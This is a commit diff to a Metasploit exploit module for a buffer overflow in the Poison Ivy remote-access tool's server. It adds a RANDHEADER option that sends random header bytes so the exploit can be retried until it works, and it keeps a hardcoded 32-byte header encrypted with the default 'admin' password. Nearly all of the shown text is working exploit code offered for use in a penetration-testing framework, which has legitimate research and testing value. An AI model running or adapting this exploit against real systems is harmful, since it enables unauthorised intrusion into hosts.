last changes done by gal, added RANDHEADER to single_exploit

modules/exploits/windows/misc/poisonivy_bof.rb

@@ -86,6 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				Opt::RPORT(3460),
+				OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
 			], self.class)
 
 		register_advanced_options(
@@ -109,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			if response[0, 16] == sig
 				print_status("Password appears to be \"admin\"")
 			else
-				print_status("Unknown password - Bruteforce target can be tried and exploit launched until success.")
+				print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
 			end
 			return Exploit::CheckCode::Vulnerable
 		end
@@ -117,7 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def single_exploit
-		header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
+		if datastore['RANDHEADER'] == true
+			# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
+			header = rand_text(0x20)
+		else
+			# This is the 32-byte header we want to send, encrypted with the default password ("admin")
+			# We have a very good chance of succeeding even if the password was changed
+			header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
+		end
 		do_exploit(header)
 	end